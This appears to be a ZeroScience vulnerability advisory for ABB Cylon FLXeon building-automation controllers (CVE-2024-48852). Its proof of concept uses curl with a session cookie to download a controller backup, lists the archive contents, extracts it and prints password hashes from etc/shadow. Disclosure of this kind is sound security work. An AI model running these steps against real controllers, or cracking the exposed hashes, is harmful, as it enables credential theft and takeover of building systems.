ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: A vulnerability exists due to an insecure backup.tgz file that, when obtained, contains sensitive system files, including main.db, SSL/TLS certificates and keys, the system shadow file with hashed passwords, and the license key. Although authentication is required to access the backup, an attacker with access could extract these files to retrieve stored credentials, decrypt secure communications, and escalate privileges by cracking password hashes. This exposure poses a significant security risk, potentially leading to unauthorized access, data breaches, and full system compromise. MSG: "Backups will perform a full backup to a file that is downloaded to you PC. This includes strategy data, BACnet settings, and settings made through this web interface." Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5924 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5924.php CVE ID: CVE-2024-48852 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -k https://7.3.3.1/api/backup \ > -o backup.tgz \ > -H "Cookie: user_sid=xxx" \ > -H "Content-type: application/json" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 37705 100 37705 0 0 15947 0 0:00:02 0:00:02 --:--:-- 15949 $ tar -tf backup.tgz etc/systemd/ etc/systemd/resolved.conf etc/systemd/journald.conf etc/systemd/user/ etc/systemd/timesyncd.conf etc/systemd/system/ etc/systemd/system/dbus-org.freedesktop.resolve1.service etc/systemd/system/basic.target.wants/ etc/systemd/system/nfsserver.service etc/systemd/system/psplash.service etc/systemd/system/default.target etc/systemd/system/dbus-org.freedesktop.network1.service etc/systemd/system/nodejs.service etc/systemd/system/modutils.service etc/systemd/system/supervisord.service etc/systemd/system/syslog.service etc/systemd/system/systemd-udevd.service etc/systemd/system/sysinit.target.wants/ etc/systemd/system/sysinit.target.wants/run-postinsts.service etc/systemd/system/local-fs.target.wants/ etc/systemd/system/local-fs.target.wants/var-volatile-spool.service etc/systemd/system/local-fs.target.wants/var-volatile-cache.service etc/systemd/system/local-fs.target.wants/var-volatile-lib.service etc/systemd/system/local-fs.target.wants/var-volatile-srv.service etc/systemd/system/systemd-random-seed.service.wants/ etc/systemd/system/systemd-random-seed.service.wants/var-volatile-lib.service etc/systemd/system/getty.target.wants/ etc/systemd/system/getty.target.wants/serial-getty@ttyGS0.service etc/systemd/system/telnetd.service etc/systemd/system/network-online.target.wants/ etc/systemd/system/network-online.target.wants/systemd-networkd-wait-online.service etc/systemd/system/nfscommon.service etc/systemd/system/bluetooth.target.wants/ etc/systemd/system/bluetooth.target.wants/bluetooth.service etc/systemd/system/sync-clocks.service etc/systemd/system/stunnel.service etc/systemd/system/lighttpd.service etc/systemd/system/ntpd.service etc/systemd/system/thttpd.service etc/systemd/system/sockets.target.wants/ etc/systemd/system/sockets.target.wants/rpcbind.socket etc/systemd/system/sockets.target.wants/dropbear.socket etc/systemd/system/sockets.target.wants/systemd-networkd.socket etc/systemd/system/dbus-1.service etc/systemd/system/systemd-hostnamed.service etc/systemd/system/multi-user.target.wants/ etc/systemd/system/multi-user.target.wants/rngd.service etc/systemd/system/multi-user.target.wants/nodejs.service etc/systemd/system/multi-user.target.wants/systemd-resolved.service etc/systemd/system/multi-user.target.wants/atd.service etc/systemd/system/multi-user.target.wants/supervisord.service etc/systemd/system/multi-user.target.wants/machines.target etc/systemd/system/multi-user.target.wants/media-sda1.mount etc/systemd/system/multi-user.target.wants/strongswan.service etc/systemd/system/multi-user.target.wants/vsftpd.service etc/systemd/system/multi-user.target.wants/crond.service etc/systemd/system/multi-user.target.wants/lighttpd.service etc/systemd/system/multi-user.target.wants/ntpd.service etc/systemd/system/multi-user.target.wants/systemd-networkd.service etc/systemd/system/multi-user.target.wants/ntpdate.service etc/systemd/system/multi-user.target.wants/remote-fs.target etc/systemd/system/multi-user.target.wants/hwclock.timer etc/systemd/system/multi-user.target.wants/gplv3-notice.service etc/systemd/system/dhcp-server.service etc/systemd/system/dbus-org.bluez.service etc/systemd/system/timers.target.wants/ etc/systemd/system/timers.target.wants/logrotate.timer etc/systemd/system/networking.service etc/systemd/coredump.conf etc/systemd/logind.conf etc/systemd/network/ etc/systemd/network/30-wlan.network etc/systemd/network/10-eth.network etc/systemd/network/60-usb.network etc/systemd/user.conf etc/systemd/system.conf etc/passwd etc/group etc/shadow etc/gshadow etc/hostname usr/local/aam/etc/com.properties usr/local/aam/etc/bdt.txt usr/local/aam/etc/bdt2.txt usr/local/aam/etc/dynamic.db usr/local/aam/etc/main-bkup.db usr/local/aam/etc/main.db usr/local/aam/etc/priArray.db usr/local/aam/etc/license.txt etc/localtime home/MIX_CMIX/node-server/certs/ home/MIX_CMIX/node-server/certs/cbxi.cert.pem home/MIX_CMIX/node-server/certs/cbxi.key.pem home/MIX_CMIX/node-server/certs/intermediate.cert.pem home/MIX_CMIX/node-server/certs/kennesaw-ca.crt usr/local/aam/fud/ usr/local/aam/fud/store/ $ tar -xf backup.tgz -C backup_extracted $ tail -n 2 backup_extracted/etc/shadow admin:$6$CYDLiwrd/dJ6GBxa$FZxr6hz56.FkEDlz2No/lZiEwX/ArpBbf/jIuLOKpPLDRy02ur0pXsVVCYdR8HmKOudNEtlNGpRh4Nkgk.s3S/:17901:0:99999:7::: cxpro:$6$tJ.mhJzEwaMWh01A$7ureB0a6.mcxhLGLwyRUeOhykLPf/FOXqWT.729Q/rjIamCGFUsxuptdrvX7GdEAy3ayzhzD8e14M.ftzyXGn0:17901:0:99999:7:::